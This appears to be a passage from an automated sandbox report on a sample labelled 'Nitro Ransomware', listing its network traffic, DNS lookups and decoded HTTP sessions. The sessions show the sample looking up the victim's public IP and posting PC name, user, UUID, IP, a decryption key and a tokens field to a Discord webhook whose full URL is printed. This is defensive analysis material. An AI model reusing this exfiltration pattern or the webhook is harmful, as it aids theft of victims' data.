                                              Sep 25, 2022 06:46:27.127051115 CEST | 443 | 49699 | 54.91.59.199 | 192.168.2.4
                                              Sep 25, 2022 06:46:27.177303076 CEST | 49699 | 443 | 192.168.2.4 | 54.91.59.199
                                              Sep 25, 2022 06:46:27.536014080 CEST | 49699 | 443 | 192.168.2.4 | 54.91.59.199
                                              Sep 25, 2022 06:46:27.579371929 CEST | 443 | 49699 | 54.91.59.199 | 192.168.2.4
                                              Sep 25, 2022 06:46:27.677349091 CEST | 443 | 49699 | 54.91.59.199 | 192.168.2.4
                                              Sep 25, 2022 06:46:27.677481890 CEST | 443 | 49699 | 54.91.59.199 | 192.168.2.4
                                              Sep 25, 2022 06:46:27.677602053 CEST | 49699 | 443 | 192.168.2.4 | 54.91.59.199
                                              Sep 25, 2022 06:46:27.682136059 CEST | 49699 | 443 | 192.168.2.4 | 54.91.59.199
                                              Sep 25, 2022 06:46:27.764818907 CEST | 49700 | 443 | 192.168.2.4 | 162.159.138.232
                                              Sep 25, 2022 06:46:27.764863968 CEST | 443 | 49700 | 162.159.138.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:27.764942884 CEST | 49700 | 443 | 192.168.2.4 | 162.159.138.232
                                              Sep 25, 2022 06:46:27.765541077 CEST | 49700 | 443 | 192.168.2.4 | 162.159.138.232
                                              Sep 25, 2022 06:46:27.765558958 CEST | 443 | 49700 | 162.159.138.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:27.815896988 CEST | 443 | 49700 | 162.159.138.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:27.816054106 CEST | 49700 | 443 | 192.168.2.4 | 162.159.138.232
                                              Sep 25, 2022 06:46:27.820883036 CEST | 49700 | 443 | 192.168.2.4 | 162.159.138.232
                                              Sep 25, 2022 06:46:27.820903063 CEST | 443 | 49700 | 162.159.138.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:27.821208954 CEST | 443 | 49700 | 162.159.138.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:27.823720932 CEST | 49700 | 443 | 192.168.2.4 | 162.159.138.232
                                              Sep 25, 2022 06:46:27.841882944 CEST | 443 | 49700 | 162.159.138.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:27.843080044 CEST | 49700 | 443 | 192.168.2.4 | 162.159.138.232
                                              Sep 25, 2022 06:46:27.883369923 CEST | 443 | 49700 | 162.159.138.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.030194044 CEST | 443 | 49700 | 162.159.138.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.030320883 CEST | 443 | 49700 | 162.159.138.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.030373096 CEST | 49700 | 443 | 192.168.2.4 | 162.159.138.232
                                              Sep 25, 2022 06:46:28.040501118 CEST | 49700 | 443 | 192.168.2.4 | 162.159.138.232
                                              Sep 25, 2022 06:46:28.094274998 CEST | 49701 | 443 | 192.168.2.4 | 162.159.138.232
                                              Sep 25, 2022 06:46:28.094310999 CEST | 443 | 49701 | 162.159.138.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.094501972 CEST | 49701 | 443 | 192.168.2.4 | 162.159.138.232
                                              Sep 25, 2022 06:46:28.095400095 CEST | 49701 | 443 | 192.168.2.4 | 162.159.138.232
                                              Sep 25, 2022 06:46:28.095412970 CEST | 443 | 49701 | 162.159.138.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.135298014 CEST | 443 | 49701 | 162.159.138.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.142936945 CEST | 49701 | 443 | 192.168.2.4 | 162.159.138.232
                                              Sep 25, 2022 06:46:28.168865919 CEST | 443 | 49701 | 162.159.138.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.171834946 CEST | 49701 | 443 | 192.168.2.4 | 162.159.138.232
                                              Sep 25, 2022 06:46:28.219379902 CEST | 443 | 49701 | 162.159.138.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.355575085 CEST | 443 | 49701 | 162.159.138.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.355654001 CEST | 443 | 49701 | 162.159.138.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.355724096 CEST | 49701 | 443 | 192.168.2.4 | 162.159.138.232
                                              Sep 25, 2022 06:46:28.357534885 CEST | 49701 | 443 | 192.168.2.4 | 162.159.138.232
                                              Sep 25, 2022 06:46:28.439064980 CEST | 49702 | 443 | 192.168.2.4 | 162.159.137.232
                                              Sep 25, 2022 06:46:28.439100027 CEST | 443 | 49702 | 162.159.137.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.439214945 CEST | 49702 | 443 | 192.168.2.4 | 162.159.137.232
                                              Sep 25, 2022 06:46:28.440165043 CEST | 49702 | 443 | 192.168.2.4 | 162.159.137.232
                                              Sep 25, 2022 06:46:28.440182924 CEST | 443 | 49702 | 162.159.137.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.479098082 CEST | 443 | 49702 | 162.159.137.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.481683969 CEST | 49702 | 443 | 192.168.2.4 | 162.159.137.232
                                              Sep 25, 2022 06:46:28.513686895 CEST | 443 | 49702 | 162.159.137.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.514225960 CEST | 49702 | 443 | 192.168.2.4 | 162.159.137.232
                                              Sep 25, 2022 06:46:28.555385113 CEST | 443 | 49702 | 162.159.137.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.715845108 CEST | 443 | 49702 | 162.159.137.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.755492926 CEST | 49702 | 443 | 192.168.2.4 | 162.159.137.232
                                              Sep 25, 2022 06:46:28.755512953 CEST | 443 | 49702 | 162.159.137.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.760358095 CEST | 49702 | 443 | 192.168.2.4 | 162.159.137.232
                                              Sep 25, 2022 06:46:28.760627031 CEST | 443 | 49702 | 162.159.137.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.760672092 CEST | 443 | 49702 | 162.159.137.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.760723114 CEST | 49702 | 443 | 192.168.2.4 | 162.159.137.232
                                              Sep 25, 2022 06:46:28.760745049 CEST | 49702 | 443 | 192.168.2.4 | 162.159.137.232
                                              Sep 25, 2022 06:46:28.847827911 CEST | 49703 | 443 | 192.168.2.4 | 162.159.136.232
                                              Sep 25, 2022 06:46:28.847882986 CEST | 443 | 49703 | 162.159.136.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.848066092 CEST | 49703 | 443 | 192.168.2.4 | 162.159.136.232
                                              Sep 25, 2022 06:46:28.848613977 CEST | 49703 | 443 | 192.168.2.4 | 162.159.136.232
                                              Sep 25, 2022 06:46:28.848628044 CEST | 443 | 49703 | 162.159.136.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.887061119 CEST | 443 | 49703 | 162.159.136.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.890903950 CEST | 49703 | 443 | 192.168.2.4 | 162.159.136.232
                                              Sep 25, 2022 06:46:28.921552896 CEST | 443 | 49703 | 162.159.136.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.923003912 CEST | 49703 | 443 | 192.168.2.4 | 162.159.136.232
                                              Sep 25, 2022 06:46:28.963368893 CEST | 443 | 49703 | 162.159.136.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:29.144817114 CEST | 443 | 49703 | 162.159.136.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:29.144951105 CEST | 443 | 49703 | 162.159.136.232 | 192.168.2.4
                                              Sep 25, 2022 06:46:29.145104885 CEST | 49703 | 443 | 192.168.2.4 | 162.159.136.232
                                              Sep 25, 2022 06:46:29.146419048 CEST | 49703 | 443 | 192.168.2.4 | 162.159.136.232
                                              Sep 25, 2022 06:48:27.301667929 CEST | 49704 | 443 | 192.168.2.4 | 162.159.137.232
                                              Sep 25, 2022 06:48:27.301717043 CEST | 443 | 49704 | 162.159.137.232 | 192.168.2.4
                                              Sep 25, 2022 06:48:27.301867008 CEST | 49704 | 443 | 192.168.2.4 | 162.159.137.232
                                              Sep 25, 2022 06:48:27.302927971 CEST | 49704 | 443 | 192.168.2.4 | 162.159.137.232
                                              Sep 25, 2022 06:48:27.302963972 CEST | 443 | 49704 | 162.159.137.232 | 192.168.2.4
                                              Sep 25, 2022 06:48:27.343424082 CEST | 443 | 49704 | 162.159.137.232 | 192.168.2.4
                                              Sep 25, 2022 06:48:27.347203970 CEST | 49704 | 443 | 192.168.2.4 | 162.159.137.232
                                              Sep 25, 2022 06:48:27.347233057 CEST | 443 | 49704 | 162.159.137.232 | 192.168.2.4
                                              Sep 25, 2022 06:48:27.378135920 CEST | 443 | 49704 | 162.159.137.232 | 192.168.2.4
                                              Sep 25, 2022 06:48:27.378690958 CEST | 49704 | 443 | 192.168.2.4 | 162.159.137.232
                                              Sep 25, 2022 06:48:27.419379950 CEST | 443 | 49704 | 162.159.137.232 | 192.168.2.4
                                              Sep 25, 2022 06:48:27.582501888 CEST | 443 | 49704 | 162.159.137.232 | 192.168.2.4
                                              Sep 25, 2022 06:48:27.582927942 CEST | 443 | 49704 | 162.159.137.232 | 192.168.2.4
                                              Sep 25, 2022 06:48:27.585274935 CEST | 49704 | 443 | 192.168.2.4 | 162.159.137.232
                                              Sep 25, 2022 06:48:27.585505962 CEST | 49704 | 443 | 192.168.2.4 | 162.159.137.232
                                              Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                              Sep 25, 2022 06:46:26.648509979 CEST | 50911 | 53 | 192.168.2.4 | 8.8.8.8
                                              Sep 25, 2022 06:46:26.667862892 CEST | 53 | 50911 | 8.8.8.8 | 192.168.2.4
                                              Sep 25, 2022 06:46:26.695760965 CEST | 59683 | 53 | 192.168.2.4 | 8.8.8.8
                                              Sep 25, 2022 06:46:26.715037107 CEST | 53 | 59683 | 8.8.8.8 | 192.168.2.4
                                              Sep 25, 2022 06:46:27.734404087 CEST | 64167 | 53 | 192.168.2.4 | 8.8.8.8
                                              Sep 25, 2022 06:46:27.756652117 CEST | 53 | 64167 | 8.8.8.8 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.072797060 CEST | 58565 | 53 | 192.168.2.4 | 8.8.8.8
                                              Sep 25, 2022 06:46:28.092818022 CEST | 53 | 58565 | 8.8.8.8 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.398125887 CEST | 52239 | 53 | 192.168.2.4 | 8.8.8.8
                                              Sep 25, 2022 06:46:28.420340061 CEST | 53 | 52239 | 8.8.8.8 | 192.168.2.4
                                              Sep 25, 2022 06:46:28.809137106 CEST | 56807 | 53 | 192.168.2.4 | 8.8.8.8
                                              Sep 25, 2022 06:46:28.844862938 CEST | 53 | 56807 | 8.8.8.8 | 192.168.2.4
                                              Sep 25, 2022 06:48:27.279858112 CEST | 61007 | 53 | 192.168.2.4 | 8.8.8.8
                                              Sep 25, 2022 06:48:27.299993992 CEST | 53 | 61007 | 8.8.8.8 | 192.168.2.4
                                              Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                              Sep 25, 2022 06:46:26.648509979 CEST | 192.168.2.4 | 8.8.8.8 | 0x1ce | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:26.695760965 CEST | 192.168.2.4 | 8.8.8.8 | 0xc51a | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:27.734404087 CEST | 192.168.2.4 | 8.8.8.8 | 0xbfce | Standard query (0) | canary.discord.com | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:28.072797060 CEST | 192.168.2.4 | 8.8.8.8 | 0xa295 | Standard query (0) | canary.discord.com | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:28.398125887 CEST | 192.168.2.4 | 8.8.8.8 | 0x6535 | Standard query (0) | canary.discord.com | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:28.809137106 CEST | 192.168.2.4 | 8.8.8.8 | 0x5d3d | Standard query (0) | canary.discord.com | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:48:27.279858112 CEST | 192.168.2.4 | 8.8.8.8 | 0x2eaf | Standard query (0) | canary.discord.com | A (IP address) | IN (0x0001) | false
                                              Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                              Sep 25, 2022 06:46:26.667862892 CEST | 8.8.8.8 | 192.168.2.4 | 0x1ce | No error (0) | api.ipify.org | api.ipify.org.herokudns.com | | CNAME (Canonical name) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:26.667862892 CEST | 8.8.8.8 | 192.168.2.4 | 0x1ce | No error (0) | api.ipify.org.herokudns.com | | 54.91.59.199 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:26.667862892 CEST | 8.8.8.8 | 192.168.2.4 | 0x1ce | No error (0) | api.ipify.org.herokudns.com | | 52.20.78.240 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:26.667862892 CEST | 8.8.8.8 | 192.168.2.4 | 0x1ce | No error (0) | api.ipify.org.herokudns.com | | 3.232.242.170 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:26.667862892 CEST | 8.8.8.8 | 192.168.2.4 | 0x1ce | No error (0) | api.ipify.org.herokudns.com | | 3.220.57.224 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:26.715037107 CEST | 8.8.8.8 | 192.168.2.4 | 0xc51a | No error (0) | api.ipify.org | api.ipify.org.herokudns.com | | CNAME (Canonical name) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:26.715037107 CEST | 8.8.8.8 | 192.168.2.4 | 0xc51a | No error (0) | api.ipify.org.herokudns.com | | 3.220.57.224 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:26.715037107 CEST | 8.8.8.8 | 192.168.2.4 | 0xc51a | No error (0) | api.ipify.org.herokudns.com | | 54.91.59.199 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:26.715037107 CEST | 8.8.8.8 | 192.168.2.4 | 0xc51a | No error (0) | api.ipify.org.herokudns.com | | 3.232.242.170 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:26.715037107 CEST | 8.8.8.8 | 192.168.2.4 | 0xc51a | No error (0) | api.ipify.org.herokudns.com | | 52.20.78.240 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:27.756652117 CEST | 8.8.8.8 | 192.168.2.4 | 0xbfce | No error (0) | canary.discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:27.756652117 CEST | 8.8.8.8 | 192.168.2.4 | 0xbfce | No error (0) | canary.discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:27.756652117 CEST | 8.8.8.8 | 192.168.2.4 | 0xbfce | No error (0) | canary.discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:27.756652117 CEST | 8.8.8.8 | 192.168.2.4 | 0xbfce | No error (0) | canary.discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:27.756652117 CEST | 8.8.8.8 | 192.168.2.4 | 0xbfce | No error (0) | canary.discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:28.092818022 CEST | 8.8.8.8 | 192.168.2.4 | 0xa295 | No error (0) | canary.discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:28.092818022 CEST | 8.8.8.8 | 192.168.2.4 | 0xa295 | No error (0) | canary.discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:28.092818022 CEST | 8.8.8.8 | 192.168.2.4 | 0xa295 | No error (0) | canary.discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:28.092818022 CEST | 8.8.8.8 | 192.168.2.4 | 0xa295 | No error (0) | canary.discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:28.092818022 CEST | 8.8.8.8 | 192.168.2.4 | 0xa295 | No error (0) | canary.discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:28.420340061 CEST | 8.8.8.8 | 192.168.2.4 | 0x6535 | No error (0) | canary.discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:28.420340061 CEST | 8.8.8.8 | 192.168.2.4 | 0x6535 | No error (0) | canary.discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:28.420340061 CEST | 8.8.8.8 | 192.168.2.4 | 0x6535 | No error (0) | canary.discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:28.420340061 CEST | 8.8.8.8 | 192.168.2.4 | 0x6535 | No error (0) | canary.discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:28.420340061 CEST | 8.8.8.8 | 192.168.2.4 | 0x6535 | No error (0) | canary.discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:28.844862938 CEST | 8.8.8.8 | 192.168.2.4 | 0x5d3d | No error (0) | canary.discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:28.844862938 CEST | 8.8.8.8 | 192.168.2.4 | 0x5d3d | No error (0) | canary.discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:28.844862938 CEST | 8.8.8.8 | 192.168.2.4 | 0x5d3d | No error (0) | canary.discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:28.844862938 CEST | 8.8.8.8 | 192.168.2.4 | 0x5d3d | No error (0) | canary.discord.com | | 162.159.128.233 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:46:28.844862938 CEST | 8.8.8.8 | 192.168.2.4 | 0x5d3d | No error (0) | canary.discord.com | | 162.159.135.232 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:48:27.299993992 CEST | 8.8.8.8 | 192.168.2.4 | 0x2eaf | No error (0) | canary.discord.com | | 162.159.137.232 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:48:27.299993992 CEST | 8.8.8.8 | 192.168.2.4 | 0x2eaf | No error (0) | canary.discord.com | | 162.159.136.232 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:48:27.299993992 CEST | 8.8.8.8 | 192.168.2.4 | 0x2eaf | No error (0) | canary.discord.com | | 162.159.138.232 | A (IP address) | IN (0x0001) | false
                                              Sep 25, 2022 06:48:27.299993992 CEST8.8.8.8192.168.2.40x2eafNo error (0)canary.discord.com162.159.135.232A (IP address)IN (0x0001)false
                                              Sep 25, 2022 06:48:27.299993992 CEST8.8.8.8192.168.2.40x2eafNo error (0)canary.discord.com162.159.128.233A (IP address)IN (0x0001)false
• api.ipify.org
• canary.discord.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
0 | 192.168.2.4 | 49699 | 54.91.59.199 | 443 | C:\Users\user\Desktop\12057ad2.exe
Timestamp | kBytes transferred | Direction | Data
2022-09-25 04:46:27 UTC | 0 | OUT | GET / HTTP/1.1
Host: api.ipify.org
Connection: Keep-Alive
2022-09-25 04:46:27 UTC | 0 | IN | HTTP/1.1 200 OK
Server: Cowboy
Connection: close
Content-Type: text/plain
Vary: Origin
Date: Sun, 25 Sep 2022 04:46:27 GMT
Content-Length: 11
Via: 1.1 vegur
2022-09-25 04:46:27 UTC | 0 | IN | Data Raw: 38 34 2e 31 37 2e 35 32 2e 34 33
Data Ascii: 84.17.52.43


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
1 | 192.168.2.4 | 49700 | 162.159.138.232 | 443 | C:\Users\user\Desktop\12057ad2.exe
Timestamp | kBytes transferred | Direction | Data
2022-09-25 04:46:27 UTC | 0 | OUT | POST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: canary.discord.com
Content-Length: 291
Expect: 100-continue
Connection: Keep-Alive
2022-09-25 04:46:27 UTC | 0 | IN | HTTP/1.1 100 Continue
2022-09-25 04:46:27 UTC | 0 | OUT | Data Raw: 63 6f 6e 74 65 6e 74 3d 25 32 41 25 32 41 50 72 6f 67 72 61 6d 2b 65 78 65 63 75 74 65 64 25 32 41 25 32 41 2b 25 36 30 25 36 30 25 36 30 53 74 61 74 75 73 25 33 41 2b 41 63 74 69 76 65 2b 25 30 41 50 43 2b 4e 61 6d 65 25 33 41 2b 44 45 53 4b 54 4f 50 2d 37 31 36 54 37 37 31 25 30 41 55 73 65 72 25 33 41 6a 6f 6e 65 73 25 30 41 55 55 49 44 25 33 41 2b 46 42 39 43 33 35 34 32 2d 46 41 37 33 2d 31 42 34 45 2d 46 42 41 34 2d 36 30 45 37 37 42 45 35 34 41 45 44 2b 2b 25 30 44 25 30 41 49 50 2b 41 64 64 72 65 73 73 25 33 41 2b 38 34 2e 31 37 2e 35 32 2e 34 33 25 36 30 25 36 30 25 36 30 26 75 73 65 72 6e 61 6d 65 3d 4e 69 74 72 6f 2b 52 61 6e 73 6f 6d 77 61 72 65 26 61 76 61 74 61 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 69 2e 69 62 62 2e 63
Data Ascii: content=%2A%2AProgram+executed%2A%2A+%60%60%60Status%3A+Active+%0APC+Name%3A+computer%0AUser%3Auser%0AUUID%3A+FB9C3542-FA73-1B4E-FBA4-60E77BE54AED++%0D%0AIP+Address%3A+84.17.52.43%60%60%60&username=Nitro+Ransomware&avatar_url=https%3A%2F%2Fi.ibb.c
2022-09-25 04:46:28 UTC | 0 | IN | HTTP/1.1 204 No Content
Date: Sun, 25 Sep 2022 04:46:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
CF-Ray: 75011dbfe81f995a-FRA
Set-Cookie: __dcfduid=045d3a2e3c8d11ed9f15ce5ff8257846; Expires=Fri, 24-Sep-2027 04:46:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Via: 1.1 google
CF-Cache-Status: DYNAMIC
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Content-Type-Options: nosniff
x-envoy-upstream-service-time: 50
x-ratelimit-bucket: 3cd1f278bd0ecaf11e0d2391374c011d
x-ratelimit-limit: 5
x-ratelimit-remaining: 4
x-ratelimit-reset: 1664081190
x-ratelimit-reset-after: 2
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=9uAyDW0ES0%2FQy8SN%2FPsw1Uc4wdp%2Fr44ju0xQ4kbhiTiaEb6mEg0AlT09n3TVJKDVvnb2%2BZ%2FrXH4hzN1MeS7%2BJZe37dbz3YC5RagNQNoMP47uPSMe2ztt6YzZsXWEnVmeIu4KtQ%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: __sdcfduid=045d3a2e3c8d11ed9f15ce5ff8257846f487f2c613d5fd5acbb69b7e6cf4ab0b3ce89c6e624d81a18b6ad811ff08caf5; Expires=Fri, 24-Sep-2027 04:46:27 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
Set-Cookie: __cfruid=7f74dd4d738e789baab8672651fdb745dc3a22e3-1664081188; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
S
2022-09-25 04:46:28 UTC | 2 | IN | Data Raw: 65 72 76 65 72 3a 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
Data Ascii: erver: cloudflare


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
2 | 192.168.2.4 | 49701 | 162.159.138.232 | 443 | C:\Users\user\Desktop\12057ad2.exe
Timestamp | kBytes transferred | Direction | Data
2022-09-25 04:46:28 UTC | 2 | OUT | POST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: canary.discord.com
Content-Length: 145
Expect: 100-continue
2022-09-25 04:46:28 UTC | 2 | IN | HTTP/1.1 100 Continue
2022-09-25 04:46:28 UTC | 2 | OUT | Data Raw: 63 6f 6e 74 65 6e 74 3d 25 36 30 25 36 30 25 36 30 44 65 63 72 79 70 74 69 6f 6e 2b 4b 65 79 25 33 41 2b 54 72 69 78 69 64 25 36 30 25 36 30 25 36 30 26 75 73 65 72 6e 61 6d 65 3d 4e 69 74 72 6f 2b 52 61 6e 73 6f 6d 77 61 72 65 26 61 76 61 74 61 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 69 2e 69 62 62 2e 63 6f 25 32 46 30 66 72 54 44 39 32 25 32 46 64 69 73 63 6f 72 64 2d 61 76 61 74 61 72 2d 35 31 32 2e 70 6e 67
Data Ascii: content=%60%60%60Decryption+Key%3A+Trixid%60%60%60&username=Nitro+Ransomware&avatar_url=https%3A%2F%2Fi.ibb.co%2F0frTD92%2Fdiscord-avatar-512.png
2022-09-25 04:46:28 UTC | 2 | IN | HTTP/1.1 204 No Content
Date: Sun, 25 Sep 2022 04:46:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
CF-Ray: 75011dc1ffe36904-FRA
Set-Cookie: __dcfduid=048f0d923c8d11ed8311ce5ff8257846; Expires=Fri, 24-Sep-2027 04:46:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Via: 1.1 google
CF-Cache-Status: DYNAMIC
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Content-Type-Options: nosniff
x-envoy-upstream-service-time: 53
x-ratelimit-bucket: 3cd1f278bd0ecaf11e0d2391374c011d
x-ratelimit-limit: 5
x-ratelimit-remaining: 3
x-ratelimit-reset: 1664081190
x-ratelimit-reset-after: 2
Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=7BBhvwHRSCmSo0lQIyByTIwcDVhwSdvnNeaOym4Z5tSguP4oC%2FhFjoDL40kZpoxd4ht85FO57f304fyqpCgaAdC1HwhAyReOF%2FrmSX%2BWMEMmVTX2szsKtAXJK1Igo4hs6YPDig%3D%3D"}],"group":"cf-nel","max_age":604800}
NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
Set-Cookie: __sdcfduid=048f0d923c8d11ed8311ce5ff825784669ae7c47eb74de324d328d5c78cc51f0299526eeb621b19e40d3d255fea157b5; Expires=Fri, 24-Sep-2027 04:46:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
Set-Cookie: __cfruid=7f74dd4d738e789baab8672651fdb745dc3a22e3-1664081188; path=/; domain=.discord.com; HttpOnly; Secure; SameSite=None
Server:
2022-09-25 04:46:28 UTC | 3 | IN | Data Raw: 20 63 6c 6f 75 64 66 6c 61 72 65 0d 0a 0d 0a
Data Ascii: cloudflare


Session ID | Source IP | Source Port | Destination IP | Destination Port | Process
3 | 192.168.2.4 | 49702 | 162.159.137.232 | 443 | C:\Users\user\Desktop\12057ad2.exe
Timestamp | kBytes transferred | Direction | Data
2022-09-25 04:46:28 UTC | 3 | OUT | POST /api/webhooks/1004011365263998976/a2AGTiGqW4Slobe2Bq9uW3XtAqYfaz6vmF6N5qjD0tSb8Mxr_xKkfGVtlH8n2bvzuN04 HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: canary.discord.com
Content-Length: 133
Expect: 100-continue
2022-09-25 04:46:28 UTC | 4 | IN | HTTP/1.1 100 Continue
2022-09-25 04:46:28 UTC | 4 | OUT | Data Raw: 63 6f 6e 74 65 6e 74 3d 25 36 30 25 36 30 25 36 30 54 6f 6b 65 6e 73 25 33 41 25 30 41 25 36 30 25 36 30 25 36 30 26 75 73 65 72 6e 61 6d 65 3d 4e 69 74 72 6f 2b 52 61 6e 73 6f 6d 77 61 72 65 26 61 76 61 74 61 72 5f 75 72 6c 3d 68 74 74 70 73 25 33 41 25 32 46 25 32 46 69 2e 69 62 62 2e 63 6f 25 32 46 30 66 72 54 44 39 32 25 32 46 64 69 73 63 6f 72 64 2d 61 76 61 74 61 72 2d 35 31 32 2e 70 6e 67
Data Ascii: content=%60%60%60Tokens%3A%0A%60%60%60&username=Nitro+Ransomware&avatar_url=https%3A%2F%2Fi.ibb.co%2F0frTD92%2Fdiscord-avatar-512.png
2022-09-25 04:46:28 UTC | 4 | IN | HTTP/1.1 204 No Content
Date: Sun, 25 Sep 2022 04:46:28 GMT
Content-Type: text/html; charset=utf-8
Connection: close
CF-Ray: 75011dc42dc5901c-FRA
Set-Cookie: __dcfduid=04c598303c8d11eda4074e000d8729a3; Expires=Fri, 24-Sep-2027 04:46:28 GMT; Max-Age=157680000; Secure; HttpOnly; Path=/
Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
Via: 1.1 google
CF-Cache-Status: DYNAMIC
Alt-Svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
X-Content-Type-Options: nosniff
